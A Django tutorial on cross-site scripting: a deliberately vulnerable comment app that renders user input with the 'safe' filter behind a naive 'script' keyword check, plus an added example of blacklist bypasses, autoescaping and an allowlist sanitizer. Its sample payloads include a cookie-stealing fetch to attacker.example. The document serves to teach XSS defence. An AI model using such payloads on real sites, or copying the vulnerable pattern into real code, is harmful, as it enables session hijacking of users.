XSS attacks
A cross-site scripting (XSS) attack is one in which an attacker gets their own JavaScript inserted into a page the site serves to other users. The page then does things the site owner never intended, because user-supplied text was rendered as trusted HTML.
Why it is dangerous: if the attacker plants JavaScript that reads `document.cookie` into a page, every user who opens that page runs it and the attacker receives that user's cookies, session ID included. With a stolen session cookie the attacker can act as that user and send requests or messages in their name.
Django gives you two ways to switch escaping off for a value: the `safe` filter in a template (front end) and `mark_safe()` in a view (back end).
Be careful with `safe`: if the text being rendered can be written by a user (a comment, a profile field, anything that arrives through a form), do not add `safe` to it. If you genuinely need to render user-supplied HTML, strip the JavaScript out on the server first (with an allowlist of harmless tags, not a keyword blacklist) and only then mark the result safe. HTML you wrote yourself and that contains no user data can be marked `safe` without concern.
The same rule applies to `mark_safe()`: sanitize any data that came from a user before you wrap it.
By default Django autoescapes every template variable; that is the layer of XSS protection you get for free, and `safe` or `mark_safe()` turns it off for one value.
Example: simulating a user typing JavaScript into the comment input box.
The CSRF middleware can be commented out in settings.py for this test, but it is not necessary: the comment form below includes `{% csrf_token %}`, so the POST goes through with the middleware enabled.
urls.py:

```python
"""djangoxss URL Configuration

The `urlpatterns` list routes URLs to views. For more information please see:
    https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
    1. Add an import:  from my_app import views
    2. Add a URL to urlpatterns:  path('', views.home, name='home')
Class-based views
    1. Add an import:  from other_app.views import Home
    2. Add a URL to urlpatterns:  path('', Home.as_view(), name='home')
Including another URLconf
    1. Import the include() function: from django.urls import include, path
    2. Add a URL to urlpatterns:  path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from app01 import views

urlpatterns = [
    path('admin/', admin.site.urls),
    path('index/', views.index),
    path('comment/', views.comment),
    path('test/', views.test),
]
```
app01/views.py:

```python
from django.shortcuts import render
from django.utils.safestring import mark_safe

# In-memory store for submitted comments (demo only; lost on restart).
msg = []


def comment(request):
    if request.method == 'GET':
        return render(request, 'comment.html')
    else:
        m = request.POST.get('content', '')
        # Deliberately simplistic check for the demo: a real filter needs far more
        # than a single keyword (case variants, event handlers, javascript: URLs).
        if "script" in m:
            return render(request, 'comment.html', {'error': 'Little punk, trying to hack me?'})
        else:
            msg.append(m)
            return render(request, 'comment.html')


def index(request):
    return render(request, 'index.html', {'msg': msg})


def test(request):
    # Developer-written HTML with no user data in it: safe to mark as safe.
    temp = "<a href='http://www.baidu.com'>baidu</a>"
    newtemp = mark_safe(temp)
    return render(request, 'test.html', {'temp': newtemp})
```
templates/index.html:

```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>index</title>
</head>
<body>
<h3>Comments</h3>
{% for item in msg %}
    {# "safe" turns autoescaping off: whatever the user typed is rendered as HTML #}
    <div>{{ item | safe }}</div>
{% endfor %}
</body>
</html>
```
templates/comment.html:

```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>comment</title>
</head>
<body>
<form action="/comment/" method="post">
    {% csrf_token %}
    <p><input type="text" name="content"></p>
    <input type="submit" value="Submit">
</form>
{% if error %}
    {# autoescaped by default, so the error text itself cannot inject markup #}
    <p>{{ error }}</p>
{% endif %}
</body>
</html>
```
templates/test.html:

```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>test</title>
</head>
<body>
{{ temp }}
</body>
</html>
```
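The following is an added example, not code from the original post or from Django, showing why the `if "script" in m` blacklist above is not a defence and what the `safe` / `mark_safe()` rule comes down to in practice. It runs without Django: the standard library's `html.escape(s, quote=True)` makes the same five replacements (`& < > " '`) as Django's autoescaping, so `render_autoescaped()` stands in for `{{ item }}` and `render_unsafe()` for `{{ item|safe }}`. The attacker payloads, the `attacker.example` host and the allowlist sanitizer are all constructed for this illustration; the sanitizer is the kind of server-side filtering you would do before calling `mark_safe()` on user content.

```python
import html
from html.parser import HTMLParser

# Constructed attacker inputs for the comment box (sample data, not from the page).
PAYLOADS = [
    "<script>alert(document.cookie)</script>",
    "<ScRiPt>alert(document.cookie)</ScRiPt>",
    '<img src=x onerror="fetch(\'//attacker.example/?c=\' + document.cookie)">',
    '<a href="javascript:alert(document.cookie)">click me</a>',
]


def naive_blacklist_rejects(text: str) -> bool:
    """The page's server-side check: reject only if the literal word 'script' appears."""
    return "script" in text


def bypasses_blacklist(payloads):
    """Payloads the keyword blacklist lets straight through."""
    return [p for p in payloads if not naive_blacklist_rejects(p)]


def render_unsafe(comments):
    """What index.html does with {{ item|safe }}: raw HTML goes into the page."""
    return "".join(f"<div>{c}</div>" for c in comments)


def render_autoescaped(comments):
    """What Django's default autoescaping does with {{ item }}:
    the same replacements of & < > " ' as django.utils.html.escape."""
    return "".join(f"<div>{html.escape(c, quote=True)}</div>" for c in comments)


class AllowlistSanitizer(HTMLParser):
    """Keep a few harmless formatting tags, drop every attribute, escape all text.
    Its output is what you could justifiably hand to mark_safe()."""

    ALLOWED = {"b", "i", "em", "strong", "p"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag names, so <ScRiPt> is seen as 'script'.
        if tag in self.ALLOWED:
            self.parts.append(f"<{tag}>")  # attributes dropped: no onerror=, no href=

    def handle_endtag(self, tag):
        if tag in self.ALLOWED:
            self.parts.append(f"</{tag}>")

    def handle_data(self, data):
        # Text content (including the body of a dropped <script>) is escaped, never trusted.
        self.parts.append(html.escape(data, quote=True))


def sanitize(text: str) -> str:
    """Allowlist-sanitize user HTML; only the result may be marked safe."""
    p = AllowlistSanitizer()
    p.feed(text)
    p.close()
    return "".join(p.parts)


if __name__ == "__main__":
    for p in PAYLOADS:
        verdict = "REJECT" if naive_blacklist_rejects(p) else "ACCEPT"
        print(f"blacklist {verdict}: {p}")
    print("\nwith |safe, the accepted ones land in the page as-is:")
    print(render_unsafe(bypasses_blacklist(PAYLOADS)))
    print("\nwith default autoescaping every payload is inert text:")
    print(render_autoescaped(PAYLOADS))
    print("\nallowlist-sanitized, ready for mark_safe():")
    print(sanitize('<b onclick="steal()">bold</b> <img src=x onerror=alert(1)>'))
```

Two of the four payloads pass the `"script"` check (the mixed-case tag and the `onerror` handler), and with `{{ item|safe }}` they execute in every visitor's browser; the same strings rendered through autoescaping contain no `<` at all. The sanitizer keeps `<b>bold</b>` but throws away the `onclick` attribute and the whole `<img>`, which is the difference between a blacklist and an allowlist.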